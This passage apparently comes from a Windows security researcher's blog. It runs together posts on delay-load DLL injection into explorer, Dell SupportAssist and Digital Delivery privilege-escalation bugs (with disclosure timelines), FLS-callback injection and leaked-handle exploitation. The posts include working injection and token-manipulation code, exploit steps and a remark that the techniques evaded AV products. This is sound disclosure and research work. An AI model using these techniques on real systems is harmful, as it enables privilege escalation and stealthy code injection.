has not been fixed up yet. We can see this by dumping it’s pseudo IAT entry:
Each DLL entry is null terminated. The above pointer shows us that the existing
entry is merely a springboard thunk within the Explorer process. This takes
us here:
The tailMerge function is a linker-generated stub that’s compiled in per-DLL,
not per function. The __delayLoadHelper2 function is the magic that
handles the loading and patching of the pseudo IAT. Documented in delayhlp.cpp,
this function handles calling LoadLibrary/GetProcAddress and patching the
pseudo IAT. As a demonstration of how this looks, I compiled a binary that
delay links dnslib. Here’s the process of resolution of
DnsAcquireContextHandle:
Now the pseudo IAT entry has been patched up and the correct function is
invoked on subsequent calls. This has the additional side effect of leaving
the pseudo IAT as both executable and writable:
At this point, the DLL has been loaded into the process and the pseudo IAT
patched up. In another additional twist, not all functions are resolved on
load, only the one that is invoked. This leaves certain entries in the
pseudo IAT in a mixed state:
1234567
00741044 00726afa explorer!_imp_load__UnInitProcessPriv
00741048 7467f845 DUI70!InitThread
0074104c 00726b0f explorer!_imp_load__UnInitThread
00741050 74670728 DUI70!InitProcessPriv
0:022> lm m DUI70
start end module name
74630000 746e2000 DUI70 (pdb symbols)
In the above, two of the four functions are resolved and the DUI70.dll library
is loaded into the process. In each entry of the delay load descriptor, the
structure referenced above maintains an RVA to the HMODULE. If the module
isn’t loaded, it will be null. So when a delayed function is invoked that’s
already loaded, the delay helper function will check it’s entry to determine if
a handle to it can be used:
12345678
HMODULE hmod = *idd.phmod;
if (hmod == 0) {
if (__pfnDliNotifyHook2) {
hmod = HMODULE(((*__pfnDliNotifyHook2)(dliNotePreLoadLibrary, &dli)));
}
if (hmod == 0) {
hmod = ::LoadLibraryEx(dli.szDll, NULL, 0);
}
The idd structure is just an instance of the InternalImgDelayDescr described
above and passed into the __delayLoadHelper2 function from the linker
tailMerge stub. So if the module is already loaded, as referenced from delay
entry, then it uses that handle instead. It does NOT attempt to LoadLibrary
irregardless of this value; this can be used to our advantage.
Another note here is that the delay loader supports notification hooks. There
are six states we can hook into: processing start, pre load library, fail
load library, pre GetProcAddress, fail GetProcAddress, and end processing. You
can see how the hooks are used in the above code sample.
Finally, in addition to delay loading, the portable executable also supports
delay library unloading. It works pretty much how you’d expect it, so we
won’t be touching on it here.
Limitations
Before detailing how we might abuse this (though it should be fairly obvious),
it’s important to note the limitations of this technique. It is not completely
portable, and using pure delay load functionality it cannot be made to be so.
The glaring limitation is that the technique requires the remote process to be
delay linked. A brief crawl of some local processes on my host shows many
Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft
applications are as well, including Chrome. It is additionally a well
supported function of the portable executable, and exists today on modern
systems.
Another limitation is that, because at it’s core it relies on LoadLibrary,
there must exist a DLL on disk. There is no way to LoadLibrary from memory
(unless you use one of the countless techniques to do that, but none of which
use LoadLibrary…).
In addition to implementing the delay load, the remote process must implement
functionality that can be triggered. Instead of doing a CreateRemoteThread,
SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and
thus we must be able to trigger the remote process into performing this
action/executing this function. This is generally pretty easy if you’re using
the suspended process/new process strategy, but may not be trivial on running
applications.
Finally, any process that does not allow unsigned libraries to be loaded will
block this technique. This is controlled by ProcessSignaturePolicy and can be
set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using
this at the moment, but Microsoft Edge was one of the first big products to be
employing this policy. This technique is also impacted by the
ProcessImageLoadPolicy policy, which can be set to restrict loading of images
from a UNC share.
Abuse
When discussing an ability to inject code into a process, there are three
separate cases an attacker may consider, and some additional edge situations
within remote processes. Local process injection is simply the execution of
shellcode/arbitrary code within the current process. Suspended process is the
act of spawning a new, suspended process from an existing, controlled one and
injecting code into it. This is a fairly common strategy to employ for
migrating code, setting up backup connections, or establishing a known process
state prior to injection. The final case is the running remote process.
The running remote process is an interesting case with several caveats that
we’ll explore below. I won’t detail suspended processes, as it’s essentially
the same as a running process, but easier. It’s easier because many
applications actually just load the delay library at runtime, either because
the functionality is environmentally keyed and required then, or because
another loaded DLL is linked against it and requires it. Refer to the source
code for the project for an implementation of suspended process injection [3].
Local Process
The local process is the most simple and arguably the most useless for this
strategy. If we can inject and execute code in this manner, we might as well
link against the library we want to use. It serves as a fine introduction to
the topic, though.
The first thing we need to do is delay link the executable against something.
For various reasons I originally chose dnsapi.dll. You can specify delay
load DLLs via the linker options for Visual Studio.
With that, we need to obtain the RVA for the delay directory. This can be
accomplished with the following function:
Should be pretty clear what we’re doing here. Once we’ve got the correct table
entry, we need to mark the entry’s DllName as writable, overwrite it with our
custom DLL name, and restore the protection mask:
Now all that’s left to do is trigger the targeted function. Once triggered,
the delay helper function will snag the DllName from the table entry and load
the DLL via LoadLibrary.
Remote Process
The most interesting of cases is the running remote process. For demonstration
here, we’ll be targeting explorer.exe, as we can almost always rely on it to be
running on a workstation under the current user.
With an open handle to the explorer process, we must perform the same
searching tasks as we did for the local process, but this time in a remote
process. This is a little more cumbersome, but the code can be found in the
project repository for reference[3]. We simply grab the remote PEB, parse the
image and it’s directories, and locate the appropriate delay entry we’re
targeting.
This part is likely to prove the most unfriendly when attempting to port this
to another process; what functionality are we targeting? What function or
delay load entry is generally unused, but triggerable from the current session?
With explorer there are several options; it’s delay linked against 9 different
DLLs, each averaging 2-3 imported functions. Thankfully one of the first
functions I looked at was pretty straightforward: CM_Request_Eject_PC. This
function, exported by CFGMGR32.dll, requests that the system be ejected from
the local docking station[4]. We can therefore assume that it’s likely to be
available and not fixed on workstations, and potentially unfixed on laptops,
should the user never explicitly request the system to be ejected.
When we request for the workstation to be ejected from the docking station, the
function sends a PNP request. We use the IShellDispatch object to execute
this, which is accessed via Shell, handled by, you guessed it, explorer.
Our DLL only needs to export CM_Request_Eject_PC for us to not crash the
process; we can either pass on the request to the real DLL, or simply ignore
it. This leads us to stable and reliable remote code injection.
Remote Process – All Fixed
One interesting edge case is a remote process that you want to inject into via
delay loading, but all imported functions have been resolved in the pseudo IAT.
This is a little more complicated, but all hope is not lost.
Remember when I mentioned earlier that a handle to the delay load library is
maintained in its descriptor? This is the value that the helper function
checks for to determine if it should reload the module or not; if it’s null, it
attempts to load it, if it’s not, it uses that handle. We can abuse this check
by nulling out the module handle, thereby “tricking” the helper function into
once again loading that descriptor’s DLL.
In the discussed case, however, the pseudo IAT is all patched up; no more
trampolines into the delay load helper function. Helpfully the pseudo IAT is
writable by default, so we can simply patch in the trampoline function
ourselves and have it instantiate the descriptor all over again. In short,
this worst-case strategy requires three separate WriteProcessMemory calls: one
to null out the module handle, one to overwrite the pseudo IAT entry, and one
to overwrite the loaded DLL name.
Conclusions
I should make mention that I tested this strategy across several next gen
AV/HIPS appliances, which will go unnamed here, and none where able to detect
the cross process injection strategy. It would seem overall to be an
interesting challenge at detection; in remote processes, the strategy uses the
following chain of calls:
That’s it. The trigger functionality would be dynamic among each process, and
the loaded library would be loaded via supported and well-known Windows
facilities. I checked out a few other core Windows applications, and they all
have pretty straightforward trigger strategies.
The referenced project[3] includes both x86 and x64 support, and has been
tested across Windows 7, 8.1, and 10. It includes three functions of interest:
inject_local, inject_suspended, and inject_explorer. It expects to find
the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed.
Note that it isn’t production quality; beware, here be dragons.
Special thanks to Stephen Breen for reviewing this post
This post details a local privilege escalation (LPE) vulnerability I found
in Dell’s SupportAssist[0] tool. The bug is in a kernel driver loaded by
the tool, and is pretty similar to bugs found by ReWolf in
ntiolib.sys/winio.sys[1], and those found by others in ASMMAP/ASMMAP64[2].
These bugs are pretty interesting because they can be used to bypass driver
signature enforcement (DSE) ad infinitum, or at least until they’re no longer
compatible with newer operating systems.
Dell’s SupportAssist is, according to the site, “(..) now preinstalled on most
of all new Dell devices running Windows operating system (..)”. It’s primary
purpose is to troubleshoot issues and provide support capabilities both to the
user and to Dell. There’s quite a lot of functionality in this software itself,
which I spent quite a bit of time reversing and may blog about at a later date.
Bug
Calling this a “bug” is really a misnomer; the driver exposes this
functionality eagerly. It actually exposes a lot of functionality, much like
some of the previously mentioned drivers. It provides capabilities for reading
and writing the model-specific register (MSR), resetting the 1394 bus, and
reading/writing CMOS.
The driver is first loaded when the SupportAssist tool is launched, and the
filename is pcdsrvc_x64.pkms on x64 and pcdsrvc.pkms on x86. Incidentally,
this driver isn’t actually even built by Dell, but rather another company,
PC-Doctor[3]. This company provides “system health solutions” to a variety of
companies, including Dell, Intel, Yokogawa, IBM, and others. Therefore, it’s
highly likely that this driver can be found in a variety of other products…
Once the driver is loaded, it exposes a symlink to the device at
PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users
on the system. This allows us to trigger one of the many IOCTLs exposed by the
driver; approximately 30. I found a DLL used by the userland agent that served
as an interface to the kernel driver and conveniently had symbol names
available, allowing me to extract the following:
Immediately the MemDriver class jumps out. After some reversing, it appeared
that these functions do exactly as expected: allow userland services to both
read and write arbitrary physical addresses. There are a few quirks, however.
To start, the driver must first be “unlocked” in order for it to begin
processing control codes. It’s unclear to me if this is some sort of hacky
event trigger or whether the kernel developers truly believed this would
inhibit malicious access. Either way, it’s goofy. To unlock the driver, a
simple ioctl with the proper code must be sent. Once received, the driver will
process control codes for the lifetime of the system.
To unlock the driver, we just execute the following:
Once the driver receives this control code and validates the received code
(0xA1B2C3D4), it sets a global flag and begins accepting all other control
codes.
Exploitation
From here, we could exploit this the same way rewolf did [4]: read out physical
memory looking for process pool tags, then traverse these until we identify our
process as well as a SYSTEM process, then steal the token. However, PCD
appears to give us a shortcut via getPhysicalAddress ioctl. If this does
indeed return the physical address of a given virtual address (VA), we can simply
find the physical of our VA and enable a couple token privileges[5] using the
writePhysicalMemory ioctl.
Keen observers will spot the problem here; the MmProbeAndLockPages call is
passing in UserMode for the KPROCESSOR_MODE, meaning we won’t be able to
resolve any kernel mode VAs, only usermode addresses.
We can still read chunks of physical memory unabated, however, as the
readPhysicalMemory function is quite simple:
They reuse a single function for reading and writing physical memory; we’ll
return to that. I decided to take a different approach than rewolf for a number
of reasons with great results.
Instead, I wanted to toggle on SeDebugPrivilege for my current process token.
This would require finding the token in memory and writing a few bytes at a
field offset. To do this, I used readPhysicalMemory to read chunks of memory
of size 0x10000000 and checked for the first field in a _TOKEN, TokenSource. In
a user token, this will be the string User32. Once we’ve identified this,
we double check that we’ve found a token by validating the TokenLuid, which we
can obtain from userland using the GetTokenInformation API.
In order to speed up the memory search, I only iterate over the addresses that
match the token’s virtual address byte index. Essentially, when you convert a
virtual address to a physical address (PA) the byte index, or the lower 12 bits,
do not change. To demonstrate, assume we have a VA of 0xfffff8a001cc2060.
Translating this to a physical address then:
12345678
kd> !pte fffff8a001cc2060
VA fffff8a001cc2060
PXE at FFFFF6FB7DBEDF88 PPE at FFFFF6FB7DBF1400 PDE at FFFFF6FB7E280070 PTE at FFFFF6FC5000E610
contains 000000007AC84863 contains 00000000030D4863 contains 0000000073147863 contains E6500000716FD963
pfn 7ac84 ---DA--KWEV pfn 30d4 ---DA--KWEV pfn 73147 ---DA--KWEV pfn 716fd -G-DA--KW-V
kd> ? 716fd * 0x1000 + 060
Evaluate expression: 1903153248 = 00000000`716fd060
So our physical address is 0x716fd060 (if you’d like to read more about
converting VA to PA, check out this great Microsoft article[6]). Notice the
lower 12 bits remain the same between VA/PA. The search loop then boiled down
to the following code:
123456789101112131415161718192021
uStartAddr = uStartAddr + (VirtualAddress & 0xfff);
for (USHORT chunk = 0; chunk < 0xb; ++chunk) {
lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000);
for(SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000){
if (memcmp((DWORD)lpMemBuf + i, "User32 ", 8) == 0){
if (TokenId <= 0x0)
FetchTokenId();
if (*(DWORD*)((char*)lpMemBuf + i + 0x10) == TokenId) {
hTokenAddr = uStartAddr;
break;
}
}
}
HeapFree(GetProcessHeap(), 0, lpMemBuf);
if (hTokenAddr > 0x0)
break;
}
Once we identify the PA of our token, we trigger two separate writes at offset
0x40 and offset 0x48, or the Enabled and Default fields of a _TOKEN. This
sometimes requires a few runs to get right (due to mapping, which I was too
lazy to work out), but is very stable.
04/05/18 – Vulnerability reported
04/06/18 – Initial response from Dell
04/10/18 – Status update from Dell
04/18/18 – Status update from Dell
05/16/18 – Patched version released (v2.2)
Back in March or April I began reversing a slew of Dell applications installed
on a laptop I had. Many of them had privileged services or processes running
and seemed to perform a lot of different complex actions. I previously
disclosed a LPE in SupportAssist[0], and identified another in their Digital
Delivery platform. This post will detail a Digital Delivery vulnerability and
how it can be exploited. This was privately discovered and disclosed, and no
known active exploits are in the wild. Dell has issued a security advisory for
this issue, which can be found here[4].
I’ll have another follow-up post detailing the internals of this application
and a few others to provide any future researchers with a starting point.
Both applications are rather complex and expose a large attack surface.
If you’re interested in bug hunting LPEs in large C#/C++ applications, it’s
a fine place to begin.
Dell’s Digital Delivery[1] is a platform for buying and installing system
software. It allows users to purchase or manage software packages and reinstall
them as necessary. Once again, it comes “..preinstalled on most Dell
systems.”[1]
Bug
The Digital Delivery service runs as SYSTEM under the name DeliveryService,
which runs the DeliveryService.exe binary. A userland binary, DeliveryTray.exe,
is the user-facing component that allows users to view installed applications
or reinstall previously purchased ones.
Communication from DeliveryTray to DeliveryService is performed via a
Windows Communication Foundation (WCF) named pipe. If you’re unfamiliar with
WCF, it’s essentially a standard methodology for exchanging data between two
endpoints[2]. It allows a service to register a processing endpoint and expose
functionality, similar to a web server with a REST API.
For those following along at home, you can find the initialization of the WCF
pipe in Dell.ClientFulfillmentService.Controller.Initialize:
ServiceHost host = null;
string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";
Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());
Tryblock.Run(delegate
{
host = new ServiceHost(classType, new Uri[]
{
realUri
});
host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);
host.Open();
}, null, null);
AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);
The endpoint is thus registered and listening and the AuthenticationManager
singleton is responsible for handling requests. Once a request comes in, the
AuthenticationManager passes this off to the AuthPipeWorker function which,
among other things, performs the following authentication:
If the process on the other end of the request is backed by a signed Dell
binary, the request is allowed and a connection may be established. If not, the
request is denied.
I noticed that this is new behavior, added sometime between 3.1 (my original
testing) and 3.5 (latest version at the time, 3.5.1001.0), so I assume Dell is
aware of this as a potential attack vector. Unfortunately, this is an
inadequate mitigation to sufficiently protect the endpoint. I was able to get
around this by simply spawning an executable signed by Dell (DeliveryTray.exe,
for example) and injecting code into it. Once code is injected, the WCF API
exposed by the privileged service is accessible.
The endpoint service itself is implemented by Dell.NamedPipe, and exposes a
dozen or so different functions. Those include:
Digital Delivery calls application install packages “entitlements”, so the
references to installation/reinstallation are specific to those packages either
available or presently installed.
One of the first functions I investigated was ReInstallEntitlement, which
allows one to initiate a reinstallation process of an installed entitlement.
This code performs the following:
This builds the arguments from the request and invokes a WCF call, which is
sent to the WCF endpoint. The ReInstallEntitlement call takes two arguments:
an entitlement ID and a RunAsUser flag. These are both controlled by the
caller.
On the server side, Dell.ClientFulfillmentService.Controller handles
implementation of these functions, and OnReInstall handles the entitlement
reinstallation process. It does a couple sanity checks, validates the package
signature, and hits the InstallationManager to queue the install request. The
InstallationManager has a job queue and background thread (WorkingThread)
that occasionally polls for new jobs and, when it receives the install job,
kicks off InstallSoftware.
Because we’re reinstalling an entitlement, the package is cached to disk and
ready to be installed. I’m going to gloss over a few installation steps
here because it’s frankly standard and menial.
The installation packages are located in
C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\ and are first
unzipped, followed by an installation of the software. In my case, I was
triggering the installation of Dell Data Protection - Security Tools v1.9.1,
and if you follow along in procmon, you’ll see it startup an install process:
The run user for this process is determined by the controllable RunAsUser flag
and, if set to False, runs as SYSTEM out of the %ProgramData% directory.
During process launch of the STSetup process, I noticed the following in
procmon:
123456
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll
Of interest here is that the parent directory, %ProgramData%\Dell\Digital
Delivery\Downloads\Software is not writable by any system user, but the
entitlement package folders, Dell Data Protection - Security Tools in this
case, is.
This allows non-privileged users to drop arbitrary files into this
directory, granting us a DLL hijacking opportunity.
Exploitation
Exploiting this requires several steps:
Drop a DLL under the appropriate %ProgramData% software package directory
Launch a new process running an executable signed by Dell
Inject C# into this process (which is running unprivileged in userland)
Connect to the WCF named pipe from within the injected process
Trigger ReInstallEntitlement
Steps 4 and 5 can be performed using the following:
1234567891011
PipeServiceClient client = new PipeServiceClient();
client.Initialize();
while (PipeServiceClient.AppState == AppState.Initializing)
System.Threading.Thread.Sleep(1000);
EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];
PipeServiceClient.ReInstallEntitlement(entitle.ID, false);
System.Threading.Thread.Sleep(30000);
PipeServiceClient.CloseConnection();
The classes used above are imported from NamedPipe.dll. Note that we’re
simply choosing the first entitlement available and reinstalling it. You may
need to iterate over entitlements to identify the correct package pointing to
where you dropped your DLL.
I’ve provided a PoC on my Github here[3], and Dell has additionally released
a security advisory, which can be found here[4].
Timeline
05/24/18 – Vulnerability initially reported
05/30/18 – Dell requests further information
06/26/18 – Dell provides update on review and remediation
07/06/18 – Dell provides internal tracking ID and update on progress
07/24/18 – Update request
07/30/18 – Dell confirms they will issue a security advisory and associated CVE
08/07/18 – 90 day disclosure reminder provided
08/10/18 – Dell confirms 8/22 disclosure date alignment
08/22/18 – Public disclosure
While working on another research project (post to be released soon, will
update here), I stumbled onto a very Hexacorn[0] inspired type of code injection
technique that fit my situation perfectly. Instead of tainting the other post
with its description and code, I figured I’d release a separate post describing
it here.
When I say that it’s Hexacorn inspired, I mean that the bulk of the strategy is
similar to everything else you’ve probably seen; we open a handle to the remote
process, allocate some memory, and copy our shellcode into it. At this point we
simply need to gain control over execution flow; this is where most of
Hexacorn’s techniques come in handy. PROPagate via window properties,
WordWarping via rich edit controls, DnsQuery via code pointers, etc. Another
great example is Windows Notification Facility via user subscription callbacks
(at least in modexp’s proof of concept), though this one isn’t Hexacorns.
These strategies are also predicated on the process having certain capabilities
(DDE, private clipboards, WNF subscriptions), but more importantly, most, if
not all, do not work across sessions or integrity levels. This is obvious and
expected and frankly quite niche, but in my situation, a requirement.
Fibers
Fibers are “a unit of execution that must be manually scheduled by the
application”[1]. They are essentially register and stack states that can be
swapped in and out at will, and reflect upon the thread in which they are
executing. A single thread can be running at most a single fiber at a time, but
fibers can be hot swapped during execution and their quantum user controlled.
Fibers can also create and use fiber data. A pointer to this is stored in
TEB->NtTib.FiberData and is a per-thread structure. This is initially set
during a call to ConvertThreadToFiber. Taking a quick look at this:
We need to spawn off the test in a new thread, as the main thread will
always have a fiber instantiated and the call will fail. If we
run this in a debugger we can inspect the data after the break:
In addition to fiber data, fibers also have access to the fiber local storage
(FLS). For all intents and purposes, this is identical to thread local storage
(TLS)[2]. This allows all thread fibers access to shared data via a global
index. The API for this is pretty simple, and very similar to TLS. In the
following sample, we’ll allocate an index and toss some values in it. Using our
previous example as base:
A pointer to this data is stored in the thread’s TEB, and can be extracted from
TEB->FlsData. From the above example, assume the returned FLS index for this
data is 6:
Let’s return to that FlsAlloc call from the above example. Its first
parameter is a PFLS_CALLBACK_FUNCTION[3] and is used for, according to MSDN:
1234
An application-defined function. If the FLS slot is in use, FlsCallback is
called on fiber deletion, thread exit, and when an FLS index is freed. Specify
this function when calling the FlsAlloc function. The PFLS_CALLBACK_FUNCTION
type defines a pointer to this callback function.
Well isn’t that lovely. These callbacks are stored process wide in
PEB->FlsCallback. Let’s try it out:
What happens when we let this run to process exit?
12345678
0:001> g
(10a8.1328): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd8000 ecx=002da998 edx=002d522c esi=00000006 edi=002da028
eip=41414141 esp=0051f71c ebp=0051f734 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
Recall the MSDN comment about when the FLS callback is invoked: ..on fiber
deletion, thread exit, and when an FLS index is freed. This means that worst
case our code executes once the process exits and best case following a
threads exit or call to FlsFree. It’s worth reiterating that the primary
thread for each process will have a fiber instantiated already; it’s quite
possible that this thread isn’t around anymore, but this doesn’t matter as the
callbacks are at the process level.
Another salient point here is the first parameter to the callback function.
This parameter is the value of whatever was in the indexed slot and is also
stashed in ECX/RCX before invoking the callback:
(aa8.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd9000 ecx=42424242 edx=003c522c esi=00000006 edi=003ca028
eip=41414141 esp=006ef9c0 ebp=006ef9d8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
41414141 ?? ???
Under specific circumstances, this can be quite useful.
Anyway, PoC||GTFO, I’ve included some code below. In it, we overwrite the
msvcrt!_freefls call used to free the FLS buffer.
#ifdef _WIN64
#define FlsCallbackOffset 0x320
#else
#define FlsCallbackOffset 0x20c
#endif
void OverwriteFlsCallback(LPVOID dwNewAddr, HANDLE hProcess)
{
_NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"),
"NtQueryInformationProcess");
const char *payload = "\xcc\xcc\xcc\xcc";
PROCESS_BASIC_INFORMATION pbi;
SIZE_T sCallback = 0, sRetLen = 0;
LPVOID lpBuf = NULL;
//
// allocate memory and write in our payload as one would normally do
//
lpBuf = VirtualAllocEx(hProcess, NULL, sizeof(SIZE_T), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, sizeof(SIZE_T), NULL);
// now we need to fetch the remote process PEB
NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi,
sizeof(PROCESS_BASIC_INFORMATION), NULL);
// read the FlsCallback address out of it
ReadProcessMemory(hProcess, (LPVOID)(((SIZE_T)pbi.PebBaseAddress) + FlsCallbackOffset),
(LPVOID)&sCallback, sizeof(SIZE_T), &sRetLen);
sCallback += 2 * sizeof(SIZE_T);
// we're targeting the _freefls call, so overwrite that with our payload
// address
WriteProcessMemory(hProcess, (LPVOID)sCallback, &dwNewAddr, sizeof(SIZE_T), &sRetLen);
}
I tested this on an updated Windows 10 x64 against notepad and mspaint; on
process exit, the callback is executed and we gain control over execution flow.
Pretty useful in the end; more on this soon…
Over the years I’ve seen and exploited the occasional leaked handle bug. These can be
particularly fun to toy with, as the handles aren’t always granted
PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity.
This post will address the various access rights assignable to handles and what we
can do to exploit them to gain elevated code execution. I’ve chosen to focus
specifically on process and thread handles as this seems to be the most common,
but surely other objects can be exploited in similar manner.
As background, while this bug can occur under various circumstances, I’ve most
commonly seen it manifest when some privileged process opens a handle with
bInheritHandle set to true. Once this happens, any child process of this
privileged process inherits the handle and all access it grants. As example,
assume a SYSTEM level process does this:
Since it’s allowing the opened handle to be inherited, any child process
will gain access to it. If they execute userland code impersonating the desktop
user, as a service might often do, those userland processes will have access to
that handle.
Existing bugs
There are several public bugs we can point to over the years as example and
inspiration. As per usual James Forshaw has a fun one from 2016[0] in which
he’s able to leak a privileged thread handle out of the secondary logon
service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but
he exploited it in a novel way that I was unaware of, at the time.
Another one from Ivan Fratric exploited[1] a leaked process handle with
PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing
Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he
identifies the JIT server process mapping memory into the content process. To
do this, the JIT process needs a handle to it. The content process calls
DuplicateHandle on itself with the PROCESS_DUP_HANDLE, which can be
exploited to obtain a full access handle.
A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS handle
was obtained from a privileged process. They were able to exploit this via a
dropped DLL and an APC.
Setup
In this post, I wanted to examine all possible access rights to determine which
were exploitable on there own and which were not. Of those that were not, I
tried to determine what concoction of privileges were necessary to make it so.
I’ve tried to stay “realistic” here in my experience, but you never know what
you’ll find in the wild, and this post reflects that.
For testing, I created a simple client and server: a privileged server that
leaks a handle, and a client capable of consuming it. Here’s the server:
#include "pch.h"
#include <iostream>
#include <Windows.h>
int main(int argc, char **argv)
{
if (argc <= 1) {
printf("[-] Please give me a target PID\n");
return -1;
}
HANDLE hUserToken, hUserProcess;
HANDLE hProcess, hThread;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
printf("[-] Failed to open user process: %d\n", GetLastError());
CloseHandle(hUserProcess);
return -1;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
printf("[+] Process: %x\n", hProcess);
CreateProcessAsUserA(hUserToken,
"VulnServiceClient.exe",
NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
SuspendThread(hThread);
return 0;
}
In the above, I’m grabbing a handle to the token we want to impersonate,
opening an inheritable handle to the current process (which we’re running as
SYSTEM), then spawning a child process. This child process is simply my client
application, which will go about attempting to exploit the handle.
The client is, of course, a little more involved. The only component that needs
a little discussion up front is fetching the leaked handle. This can be done
via NtQuerySystemInformation and does not require any special privileges:
void ProcessHandles()
{
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
_NtQuerySystemInformation NtQuerySystemInformation =
(_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject =
(_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
_NtQueryObject NtQueryObject =
(_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
_RtlEqualUnicodeString RtlEqualUnicodeString =
(_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
_RtlInitUnicodeString RtlInitUnicodeString =
(_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
ULONG handleInfoSize = 0x10000;
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
DWORD dwPid = GetCurrentProcessId();
printf("[+] Looking for process handles...\n");
while ((status = NtQuerySystemInformation(
SystemHandleInformation,
phHandleInfo,
handleInfoSize,
NULL
)) == STATUS_INFO_LENGTH_MISMATCH)
phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);
if (status != STATUS_SUCCESS)
{
printf("NtQuerySystemInformation failed!\n");
return;
}
printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);
// iterate handles until we find the privileged process
for (int i = 0; i < phHandleInfo->HandleCount; ++i)
{
SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
POBJECT_TYPE_INFORMATION objectTypeInfo;
PVOID objectNameInfo;
UNICODE_STRING objectName;
ULONG returnLength;
// Check if this handle belongs to the PID the user specified
if (handle.ProcessId != dwPid)
continue;
objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
if (NtQueryObject(
(HANDLE)handle.Handle,
ObjectTypeInformation,
objectTypeInfo,
0x1000,
NULL
) != STATUS_SUCCESS)
continue;
if (handle.GrantedAccess == 0x0012019f)
{
free(objectTypeInfo);
continue;
}
objectNameInfo = malloc(0x1000);
if (NtQueryObject(
(HANDLE)handle.Handle,
ObjectNameInformation,
objectNameInfo,
0x1000,
&returnLength
) != STATUS_SUCCESS)
{
objectNameInfo = realloc(objectNameInfo, returnLength);
if (NtQueryObject(
(HANDLE)handle.Handle,
ObjectNameInformation,
objectNameInfo,
returnLength,
NULL
) != STATUS_SUCCESS)
{
free(objectTypeInfo);
free(objectNameInfo);
continue;
}
}
// check if we've got a process object; there should only be one, but should we
// have multiple, this is where we'd perform the checks
objectName = *(PUNICODE_STRING)objectNameInfo;
UNICODE_STRING pProcess, pThread;
RtlInitUnicodeString(&pThread, L"Thread");
RtlInitUnicodeString(&pProcess, L"Process");
if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
printf("[+] Found process handle (%x)\n", handle.Handle);
HANDLE hProcess = (HANDLE)handle.Handle;
}
else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
printf("[+] Found thread handle (%x)\n", handle.Handle);
HANDLE hThread = (HANDLE)handle.Handle;
else
continue;
free(objectTypeInfo);
free(objectNameInfo);
}
}
We’re essentially just fetching all system handles, filtering down to ones
belonging to our process, then hunting for a thread or a process. In a more
active client process with many threads or process handles we’d need to filter
down further, but this is sufficient for testing.
The remainder of this post will be broken down into process and thread security
access rights.
Process
There are approximately 14 process-specific rights[3]. We’re going to ignore
the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they
